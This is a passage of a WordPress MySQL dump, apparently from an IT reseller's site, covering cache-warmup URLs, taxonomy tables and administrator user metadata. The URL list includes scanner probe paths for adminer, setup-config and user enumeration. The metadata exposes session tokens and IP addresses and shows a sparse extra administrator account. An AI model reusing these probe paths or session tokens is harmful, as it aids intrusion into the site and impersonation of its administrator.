blog/portfolio/netapp/',1590,0,0,''),('f1e42552e2292086b482aa49cb0d9b57','https://bintara.com.my/blog/portfolio/microsoft/',1600,0,0,''),('9efc140013c71b480d2886724ffc8513','https://bintara.com.my/blog/portfolio/motorola/',1610,0,0,''),('18c5f4cb0e9f8c99e6fc92df1ea6e885','https://bintara.com.my/blog/portfolio/mcafee/',1620,0,0,''),('ceb7fed82417f7105d21ff45423707f2','https://bintara.com.my/blog/portfolio/mapinfo/',1630,0,0,''),('c78951f03c9e713e070f5ad4a09cb764','https://bintara.com.my/blog/portfolio/logitech/',1640,0,0,''),('87b38d9eb3c1d4bdba35e1e34b0ec90d','https://bintara.com.my/blog/portfolio/lg/',1650,0,0,''),('bf4eb971b3c811d8e9f579d188d95d9a','https://bintara.com.my/blog/portfolio/lenovo/',1660,0,0,''),('574d276ae3044da956d1684a31ddb722','https://bintara.com.my/blog/portfolio/kingston/',1670,0,0,''),('ba1dba312d67e063f7fce7a6e7a68ab5','https://bintara.com.my/blog/portfolio/kaspersky/',1680,0,0,''),('826b245f52e11fa48daf3281a49ea5ee','https://bintara.com.my/blog/portfolio/juniper/',1690,0,0,''),('2d72eedfe38931ac002ccaff68032a38','https://bintara.com.my/blog/portfolio/jabra/',1700,0,0,''),('d482a7d54e2e8473e4b1356798cc6eb1','https://bintara.com.my/blog/portfolio/infocus/',1710,0,0,''),('72649aa2cb81e5477e06533c142bb0b1','https://bintara.com.my/blog/portfolio/ibm/',1720,0,0,''),('93df5c9f6bf2b5434b644cffef647563','https://bintara.com.my/blog/portfolio/huawei/',1730,0,0,''),('3b121df311e1e140e58fbc4dde2bdfbf','https://bintara.com.my/blog/portfolio/hpe/',1740,0,0,''),('76d61e75a99a55697c0dde3611217c86','https://bintara.com.my/blog/portfolio/hp/',1750,0,0,''),('8769ef0651bca4903aabba151bb11336','https://bintara.com.my/blog/portfolio/houdini/',1760,0,0,''),('99fc9a98a53734102c159f33ad064fbe','https://bintara.com.my/blog/portfolio/fujixerox/',1770,0,0,''),('cf6f96cf62647aa6fe83002e991108db','https://bintara.com.my/blog/portfolio/fortinet/',1780,0,0,''),('9213b8ec5477350370f790eb5fe33348','https://bintara.com.my/blog/portfolio/faronics/',1790,0,0,''),('d5734c692298f2a0cdfb6af28bf59c63','https://bintara.com.my/blog/portfolio/eset/',1800,0,0,''),('79d019c952458860dcf9574afd4f8f60','https://bintara.com.my/blog/portfolio/ergotron/',1810,0,0,''),('b5aa4c95d3df3e9cb6807b12b5099ca7','https://bintara.com.my/blog/portfolio/epson/',1820,0,0,''),('2e811eb78130e641316a4684932e273d','https://bintara.com.my/blog/portfolio/dropbox/',1830,0,0,''),('b8569b23fc9af7ed3f90319d8e89bc00','https://bintara.com.my/blog/portfolio/docusign/',1840,0,0,''),('68125773543d8093e650e83fedf292fd','https://bintara.com.my/blog/portfolio/d-link/',1850,0,0,''),('f1a2691b2faa8ba8ea90c452d0b88827','https://bintara.com.my/blog/portfolio/dell-emc/',1860,0,0,''),('78d78ff09256ba4bc19d143f5d1b2cf3','https://bintara.com.my/blog/portfolio/coreldraw/',1870,0,0,''),('215a31ed18768375c4f33e7347a5887f','https://bintara.com.my/blog/portfolio/cisco/',1880,0,0,''),('56de8bc4696fde538ad9308ab4a413cf','https://bintara.com.my/supply-chain-services/',1890,0,0,''),('3e541e8a30ec2234c91b501434d4488e','https://bintara.com.my/blog/portfolio/canon/',1900,0,0,''),('f61e92158b94e4cd69e7aafb82974ab9','https://bintara.com.my/services/',1910,0,0,''),('37d22e207acaed7292fec330bee5cc08','https://bintara.com.my/blog/portfolio/cambium/',1920,0,0,''),('9b196c288f06bd6b082196fbdb37c06b','https://bintara.com.my/blog/portfolio/bitdefender/',1930,0,0,''),('5ba94808b3a4d279dbd02c884692e7f8','https://bintara.com.my/solutions/',1940,0,0,''),('dc3b82166dc9716f11626314ea5cad84','https://bintara.com.my/blog/portfolio/benq/',1950,0,0,''),('9863da3ba58b95c482dd47ddf294addb','https://bintara.com.my/blog/portfolio/belkin/',1960,0,0,''),('b75fe12b3a5032591862f00eaf66d8f6','https://bintara.com.my/blog/portfolio/barracuda/',1970,0,0,''),('146397257fb5148fcf1f4582c0c11daf','https://bintara.com.my/blog/portfolio/autodesk/',1980,0,0,''),('6a07589d554473dfee70baedd3817e1b','https://bintara.com.my/blog/portfolio/atlas-ti/',1990,0,0,''),('e94f4170a03326a889a6d467a1a39c9f','https://bintara.com.my/blog/portfolio/asus/',2000,0,0,''),('b2ce4eae291da5a55a07322fa762393a','https://bintara.com.my/blog/portfolio/aruba/',2010,0,0,''),('b6f0411fab64039c4a6d5529f0491a80','https://bintara.com.my/blog/portfolio/apple/',2020,0,0,''),('27652bd7d03d711eed2edfa2f894caca','https://bintara.com.my/blog/portfolio/apc/',2030,0,0,''),('6f18238fd84df5515557598975b9a761','https://bintara.com.my/blog/portfolio/anydesk/',2040,0,0,''),('e3674b3004519d2c9d33272025a1b6bf','https://bintara.com.my/blog/portfolio/adobe/',2050,0,0,''),('b3b1e07bba1a2a54f3ecd07b01b9f0be','https://bintara.com.my/blog/portfolio/acronis/',2060,0,0,''),('df88876446db1523293b16a8fb8ce2d6','https://bintara.com.my/blog/portfolio/acer/',2070,0,0,''),('24f060eea0233495a9894b7ac0693674','https://bintara.com.my/products-acer/',2080,0,0,''),('de2239d58d822d9b5428aafa4bc28472','https://bintara.com.my/news-events/',2090,0,0,''),('5d32555d8d647a71922352feef044311','https://bintara.com.my/careers/',2100,0,0,''),('ace9c837c996c02bd0f076af788afc38','https://bintara.com.my/products-services/',2110,0,1573720959,'html'),('78e8b7af61392962b9b070b605e6f543','https://bintara.com.my/contact-us/',2120,0,0,''),('7237ef4d794ba5de2219754d7891a8bc','https://bintara.com.my/logitech/',2130,0,1573722119,'html'),('3f17b1e8c084c008e4b3f085ca9b76a5','https://bintara.com.my/blog/2018/12/11/logitech-rally/',2140,0,1573715644,'html'),('bac5c4c0bce4f2c6a0aad69518f1bc62','https://bintara.com.my/products-acer/page/4/',40,0,1573246610,'html'),('8cca377be633ecb9614ce570e6007a76','http://bintara.com.my/robots.txt',40,0,1573748576,'html'),('fdf4d07c7f12b96e9738fb48c1eaacf1','http://bintara.com.my/wp-json/oembed/1.0/embed',40,0,0,''),('71b5c482747306616d0e8bed315c0819','https://bintara.com.my/wp-json/',40,0,0,''),('af4167aeac94a52af600c029c82374a0','http://bintara.com.my/wp-admin/setup-config.php',40,0,0,''),('fa170766c5f020c80dec9d5bb9492189','http://bintara.com.my/wordpress/wp-admin/mysql-adminer.php',40,0,0,''),('57dcd299348f21d96c3c1458b24ccae0','http://bintara.com.my/v1/wp-admin/mysql-adminer.php',40,0,0,''),('e1953ca0ad81297e8619096c51c64cb4','http://bintara.com.my/cms/wp-admin/mysql-adminer.php',40,0,0,''),('54529790ff9634e9943cbca20a47b837','http://bintara.com.my/2019/wp-admin/setup-config.php',40,0,0,''),('f6618f23a43c3893a02a56b5f73ac225','http://bintara.com.my/wp-json/wp/v2/users/',40,0,0,''),('09177a98b8e20b80af7f1d999e92614b','http://bintara.com.my/new/wp-admin/setup-config.php',40,0,0,''),('6516c9cd34623d4995e6bb84c1d9c553','http://bintara.com.my/beta/wp-admin/mysql-adminer.php',40,0,0,''),('4ffdf1d60217198210b9b8338cb48f53','http://bintara.com.my/1/wp-admin/setup-config.php',40,0,0,''),('336cd2aa0258de3f172935601d309c95','http://bintara.com.my/staging/wp-admin/setup-config.php',40,0,0,''),('fb45f49b15bda0ea94f4cffb6434fffc','http://bintara.com.my/store/wp-admin/setup-config.php',40,0,0,''),('8364ebcbb09c1f10d5d195fa886488af','https://bintara.com.my/products-acer/page/5/',40,0,1573136814,'html'),('03e78cd36245c93f72eecefe0ff58788','http://bintara.com.my/website/wp-admin/mysql-adminer.php',40,0,0,''),('68cf926fb67ddf20bd55a42ad55444c5','http://bintara.com.my/old/wp-admin/mysql-adminer.php',40,0,0,''),('720f52cd75bfe1a63b7ae69b922b0c19','http://bintara.com.my/2018/wp-admin/setup-config.php',40,0,0,''),('825f4fff8c1a3b53e47215eb9aef7a50','http://bintara.com.my/wordpress/wp-admin/setup-config.php',40,0,0,''),('24658105af80ffc91ae4dc1d376e069e','http://bintara.com.my/portal/wp-admin/mysql-adminer.php',40,0,0,''),('edb1a1e104f1e4268ef4e4a5b4931054','http://bintara.com.my/oldsite/wp-admin/mysql-adminer.php',40,0,0,''),('04caf8fbcc6c5c12d5cddbfbd14a2999','http://bintara.com.my/www/wp-admin/mysql-adminer.php',40,0,0,''),('5aff53ee340e61761d9d406ce47c2232','http://bintara.com.my/website/wp-admin/setup-config.php',40,0,0,''),('d98208539c471582428a7085b6e8d040','http://bintara.com.my/cms/wp-admin/setup-config.php',40,0,0,''),('f44476b0d22951623986c11257ea8b93','http://bintara.com.my/beta/wp-admin/setup-config.php',40,0,0,''),('c73587315c35b76d36e29defb740fb82','http://bintara.com.my/portal/wp-admin/setup-config.php',40,0,0,''),('6f12a1d5248af2b5c8e2932a0808a5f5','http://bintara.com.my/demo/wp-admin/mysql-adminer.php',40,0,0,''),('1375121ab674868ccf38b16dc23e8f31','http://bintara.com.my/www/wp-admin/setup-config.php',40,0,0,''),('1f6eae2f816a3361bfcc9be4ebbd53e3','http://bintara.com.my/oldsite/wp-admin/setup-config.php',40,0,0,''),('a6c4f717ded55406510cfb3e7698e838','http://bintara.com.my/store/wp-admin/mysql-adminer.php',40,0,0,''),('08267570eac6be2e83693c9013e9a51a','http://bintara.com.my/news/wp-admin/mysql-adminer.php',40,0,0,''),('e44322bf646c2bc9a59a5875b2dbde95','http://bintara.com.my/wp-admin/mysql-adminer.php',40,0,0,''),('393d3ca6194d6cf0a315b506e7ba0517','http://bintara.com.my/blog/wp-admin/setup-config.php',40,0,0,''),('4dd5f12b9746a7d09564dd42d20b14cc','http://bintara.com.my/2018/wp-admin/mysql-adminer.php',40,0,0,''),('e3f6e57746902c96cad3f36e77500972','https://bintara.com.my/products-acer/page/6/',40,0,1573409573,'html'),('7b27f64f451acf8ed2dadfc4c66bb585','http://bintara.com.my/wp2/wp-admin/mysql-adminer.php',40,0,0,''),('f6d63757539e7a9e546bfcf8a9af956d','http://bintara.com.my/1/wp-admin/mysql-adminer.php',40,0,0,''),('73c83b361c356552d78ed5d546b658df','http://bintara.com.my/newsite/wp-admin/mysql-adminer.php',40,0,0,''),('53c20f91833f9cd81f6789e94e515fc5','https://bintara.com.my/About/',40,0,1573283646,'html'),('94ed6a3c3e18bf95dd295edec54f1ce4','http://bintara.com.my/old/wp-admin/setup-config.php',40,0,0,''),('412731c83d137ca40f8ed326a6350a1a','http://bintara.com.my/v2/wp-admin/mysql-adminer.php',40,0,0,''),('6d2d859d043ca2e981dc96706e30cb2e','http://bintara.com.my/blogs/wp-admin/setup-config.php',40,0,0,''),('5e1162bd42bbb0cd7937c4666767e100','http://bintara.com.my/wp2/wp-admin/setup-config.php',40,0,0,''),('1690fd36f75843904cd155dd5bde4664','http://bintara.com.my/newsite/wp-admin/setup-config.php',40,0,0,''),('c0b8fcf1c2d7be1af9f0c84f1281c35c','http://bintara.com.my/new/wp-admin/mysql-adminer.php',40,0,0,''),('485130805bc89f6bb90b653e5c808266','http://bintara.com.my/2019/wp-admin/mysql-adminer.php',40,0,0,''),('df9a871dbd63a38514a8558a2fc8623a','http://bintara.com.my/v2/wp-admin/setup-config.php',40,0,0,''),('e793b1f2ad3ba39765c00cc495399fc7','http://bintara.com.my/demo/wp-admin/setup-config.php',40,0,0,''),('54b82dc0ae041bad9191f134176f071f','http://bintara.com.my/news/wp-admin/setup-config.php',40,0,0,''),('8f7c03fc2b2218731b560ed34c0c107f','http://bintara.com.my/blogs/wp-admin/mysql-adminer.php',40,0,0,''),('7dd1efb7dbcf4e7dac1809886a8e79e8','https://bintara.com.my/products-acer/page/2/',40,0,1573428666,'html'),('a7742e79d0b9b958c68a2752e3c2084a','http://bintara.com.my/dev/wp-admin/setup-config.php',40,0,0,''),('7491dd3369fec040c881b2e9e29fb41e','https://bintara.com.my/wp-admin/yt.php',40,0,0,''),('6f397b14733f1f2357908754d53aecfc','http://bintara.com.my/wp/v2/users/',40,0,0,''),('5b9918814900ef7cfddc6efbe70d0e33','http://bintara.com.my/wp-admin/admin-ajax.php',40,0,0,''),('441ae994c46a5826fd1dc913d57dfc68','http://bintara.com.my/admin-ajax.php',40,0,0,''),('13b7bd3d48595ad487d1483312d7245a','http://bintara.com.my/test/wp-admin/mysql-adminer.php',40,0,0,'');
/*!40000 ALTER TABLE `wpdp_swift_performance_warmup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_term_relationships`
--

DROP TABLE IF EXISTS `wpdp_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `term_order` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_term_relationships`
--

LOCK TABLES `wpdp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpdp_term_relationships` DISABLE KEYS */;
INSERT INTO `wpdp_term_relationships` (`object_id`, `term_taxonomy_id`, `term_order`) VALUES (1284,22,0),(1297,22,0),(1303,22,0),(1304,22,0),(1305,22,0),(1306,22,0),(1,4,0);
/*!40000 ALTER TABLE `wpdp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_term_taxonomy`
--

DROP TABLE IF EXISTS `wpdp_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `taxonomy` varchar(32) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `description` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT '0',
  `count` bigint(20) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=MyISAM AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_term_taxonomy`
--

LOCK TABLES `wpdp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpdp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpdp_term_taxonomy` (`term_taxonomy_id`, `term_id`, `taxonomy`, `description`, `parent`, `count`) VALUES (1,1,'category','',0,0),(2,2,'category','',0,0),(3,3,'category','',0,0),(4,4,'category','',0,1),(5,5,'category','',0,0),(6,6,'post_tag','',0,0),(7,7,'post_tag','',0,0),(8,8,'post_tag','',0,0),(9,9,'post_tag','',0,0),(10,10,'post_tag','',0,0),(11,11,'post_tag','',0,0),(12,12,'post_tag','',0,0),(13,13,'post_tag','',0,0),(14,14,'post_tag','',0,0),(15,15,'portfolio_cat','',0,0),(16,16,'portfolio_cat','',0,0),(17,17,'portfolio_cat','',0,0),(18,18,'portfolio_cat','',0,0),(19,19,'portfolio_cat','',0,0),(20,20,'portfolio_cat','',0,0),(21,21,'nav_menu','',0,0),(22,22,'nav_menu','',0,6);
/*!40000 ALTER TABLE `wpdp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_termmeta`
--

DROP TABLE IF EXISTS `wpdp_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_termmeta`
--

LOCK TABLES `wpdp_termmeta` WRITE;
/*!40000 ALTER TABLE `wpdp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpdp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_terms`
--

DROP TABLE IF EXISTS `wpdp_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `slug` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT '0',
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=MyISAM AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_terms`
--

LOCK TABLES `wpdp_terms` WRITE;
/*!40000 ALTER TABLE `wpdp_terms` DISABLE KEYS */;
INSERT INTO `wpdp_terms` (`term_id`, `name`, `slug`, `term_group`) VALUES (1,'Uncategorized','uncategorized',0),(2,'Apps','apps',0),(3,'Markup','markup',0),(4,'One page','one-page',0),(5,'Responsive','responsive',0),(6,'alignment','alignment',0),(7,'alignment','alignment-2',0),(8,'captions','captions-2',0),(9,'content','content',0),(10,'content','content-2',0),(11,'css','css',0),(12,'image','image',0),(13,'markup','markup',0),(14,'markup','markup-2',0),(15,'Branding','branding',0),(16,'Graphic','graphic',0),(17,'Package','package',0),(18,'Video','video',0),(19,'Web','web',0),(20,'Web Design','web-design',0),(21,'Primary','primary',0),(22,'Main Menu','main-menu',0);
/*!40000 ALTER TABLE `wpdp_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpdp_usermeta`
--

DROP TABLE IF EXISTS `wpdp_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpdp_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT '0',
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=MyISAM AUTO_INCREMENT=113 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpdp_usermeta`
--

LOCK TABLES `wpdp_usermeta` WRITE;
/*!40000 ALTER TABLE `wpdp_usermeta` DISABLE KEYS */;
INSERT INTO `wpdp_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (1,1,'nickname','pentadbirweb'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wpdp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wpdp_user_level','10'),(14,1,'dismissed_wp_pointers','wp496_privacy,theme_editor_notice,plugin_editor_notice,smush_pointer'),(15,1,'show_welcome_panel','0'),(17,1,'wpdp_dashboard_quick_press_last_post_id','3690'),(18,1,'source_domain','bintara.com.my'),(19,1,'primary_blog','1'),(21,1,'wpdp_user-settings','libraryContent=browse&editor=tinymce&advImgDetails=show&imgsize=full&mfold=o&hidetb=1&editor_plain_text_paste_warning=1&post_dfw=off'),(22,1,'wpdp_user-settings-time','1573015118'),(23,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"115.132.145.0\";}'),(71,1,'elementor_admin_notices','a:1:{s:16:\"rate_us_feedback\";s:4:\"true\";}'),(72,1,'closedpostboxes_dashboard','a:1:{i:0;s:27:\"wpforms_reports_widget_lite\";}'),(73,1,'metaboxhidden_dashboard','a:0:{}'),(24,2,'nickname','famedemo'),(25,2,'first_name','FameThemes'),(26,2,'last_name',''),(27,2,'description','This user is created while installing demo content. You should delete or modify this user&#8217;s information now.'),(28,2,'rich_editing','true'),(29,2,'syntax_highlighting','true'),(30,2,'comment_shortcuts','false'),(31,2,'admin_color','fresh'),(32,2,'use_ssl','0'),(33,2,'show_admin_bar_front','true'),(34,2,'locale',''),(35,2,'wpdp_capabilities','a:1:{s:10:\"subscriber\";b:1;}'),(36,2,'wpdp_user_level','0'),(37,2,'dismissed_wp_pointers','wp496_privacy'),(38,1,'maxbuttons_review_notice','off'),(39,1,'vfb-form-settings','a:14:{i:1;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:2;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:3;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"confirmation\";}i:5;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:4;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:6;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:7;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:8;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:9;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:10;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:11;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:12;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}i:13;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:16:\"general-settings\";}i:14;a:2:{s:16:\"form_setting_tab\";s:6:\"opened\";s:17:\"setting_accordion\";s:12:\"notification\";}}'),(40,1,'nav_menu_recently_edited','22'),(41,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(42,1,'metaboxhidden_nav-menus','a:3:{i:0;s:23:\"add-post-type-portfolio\";i:1;s:12:\"add-post_tag\";i:2;s:17:\"add-portfolio_cat\";}'),(43,1,'closedpostboxes_post','a:0:{}'),(44,1,'metaboxhidden_post','a:6:{i:0;s:12:\"revisionsdiv\";i:1;s:11:\"postexcerpt\";i:2;s:13:\"trackbacksdiv\";i:3;s:10:\"postcustom\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(45,1,'manageedit-pagecolumnshidden','a:0:{}'),(46,1,'edit_page_per_page','100'),(48,1,'meta-box-order_page','a:3:{s:4:\"side\";s:59:\"submitdiv,pageparentdiv,postimagediv,onepress_page_settings\";s:6:\"normal\";s:99:\"postexcerpt,postcustom,wpseo_meta,aiosp,commentstatusdiv,commentsdiv,slugdiv,authordiv,revisionsdiv\";s:8:\"advanced\";s:0:\"\";}'),(49,1,'screen_layout_page','2'),(50,1,'_yoast_wpseo_profile_updated','1544516820'),(51,1,'aioseop_seen_about_page','3.2.10'),(52,1,'closedpostboxes_page','a:1:{i:0;s:12:\"postimagediv\";}'),(53,1,'metaboxhidden_page','a:6:{i:0;s:11:\"postexcerpt\";i:1;s:10:\"postcustom\";i:2;s:16:\"commentstatusdiv\";i:3;s:11:\"commentsdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(54,1,'elementor_introduction','a:2:{i:2;b:1;s:7:\"flexbox\";b:1;}'),(66,1,'meta-box-order_dashboard','a:4:{s:6:\"normal\";s:149:\"e-dashboard-overview,wpforms_reports_widget_lite,dashboard_right_now,dashboard_activity,vfb-dashboard,semperplugins-rss-feed,wpseo-dashboard-overview\";s:4:\"side\";s:39:\"dashboard_quick_press,dashboard_primary\";s:7:\"column3\";s:0:\"\";s:7:\"column4\";s:0:\"\";}'),(70,1,'wpdp_wpseo-recalibration-meta-notification','seen'),(95,1,'swift_pointers','a:2:{i:0;s:0:\"\";s:13:\"settings-mode\";s:13:\"settings-mode\";}'),(67,1,'wpdp_wpseo-upsell-notice','seen'),(68,1,'wpseo-remove-upsell-notice','1'),(106,1,'wpdp_wpseo-conflict-07b95b67cae87afa4939008dbf832b83','seen'),(109,1,'wpdp_wpseo-conflict-d3e7311d20ccd459ef1ade2a522ccfe6','seen'),(55,1,'itsec_user_activity_last_seen','1571985384'),(56,1,'itsec-settings-view','grid'),(57,1,'_itsec_has_logged_in','1545792475'),(58,1,'jetpack_tracks_anon_id','jetpack:MaNnMTWLmbFFUdRxI5YfiMUr'),(59,1,'itsec_logs_page_screen_options','a:6:{s:8:\"per_page\";i:20;s:12:\"default_view\";s:9:\"important\";s:5:\"color\";b:1;s:10:\"show_debug\";b:0;s:12:\"show_process\";b:0;s:9:\"last_seen\";i:0;}'),(60,1,'itsec-password-strength','4'),(65,1,'itsec_last_password_change','1545893678'),(62,1,'_itsec_password_requirements','a:1:{s:16:\"evaluation_times\";a:1:{s:8:\"strength\";i:1545893711;}}'),(64,1,'googleplus',''),(75,1,'wfls-last-login','1569921975'),(85,1,'icwp-wpsf-meta','a:6:{s:6:\"prefix\";s:9:\"icwp-wpsf\";s:7:\"user_id\";i:1;s:9:\"pass_hash\";s:4:\"4a5e\";s:15:\"pass_started_at\";i:1569079582;s:13:\"first_seen_at\";i:1569079582;s:13:\"last_login_at\";i:1573006524;}'),(86,1,'icwp-wpsf-meta-version','823'),(111,3,'wpdp_user_level','10'),(112,3,'wpdp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(110,1,'session_tokens','a:2:{s:64:\"4be4a7be12098569c78f7dbca2a5d173a8bec4caee72635df0aa7b8608252357\";a:4:{s:10:\"expiration\";i:1573086937;s:2:\"ip\";s:15:\"175.142.115.248\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36\";s:5:\"login\";i:1572914137;}s:64:\"250ce3c3c6b2f57cf419f45b2b484231b8b37c037bcf840120cddb4bad93743a\";a:4:{s:10:\"expiration\";i:1573179325;s:2:\"ip\";s:15:\"115.132.145.182\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36\";s:5:\"login\";i:1573006525;}}'),(104,1,'wpdp_yoast_notifications','a:4:{i:0;a:2:{s:7:\"message\";s:312:\"The configuration wizard helps you to easily configure your site to have the optimal SEO settings.<br/>We have detected that you have not finished this wizard yet, so we recommend you to <a href=\"https://bintara.com.my/wp-admin/?page=wpseo_configurator\">start the configuration wizard to configure Yoast SEO</a>.\";s:7:\"options\";a:9:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:31:\"wpseo-dismiss-onboarding-notice\";s:5:\"nonce\";N;s:8:\"priority\";d:0.8000000000000000444089209850062616169452667236328125;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}i:1;a:2:{s:7:\"message\";s:614:\"<p>The <em>Google XML Sitemaps</em> plugin might cause issues when used in conjunction with Yoast SEO.</p><p>Both Yoast SEO and Google XML Sitemaps can create XML sitemaps. Having two XML sitemaps is not beneficial for search engines and might slow down your site.<br/><br/><a class=\"button\" href=\"https://bintara.com.my/wp-admin/admin.php?page=wpseo_dashboard#top#features\">Toggle Yoast SEO\'s XML Sitemap</a></p><a class=\"button button-primary\" href=\"plugins.php?action=deactivate&amp;plugin=google-sitemap-generator%2Fsitemap.php&amp;plugin_status=all&amp;_wpnonce=17a48238c2\">Deactivate Google XML Sitemaps</a> 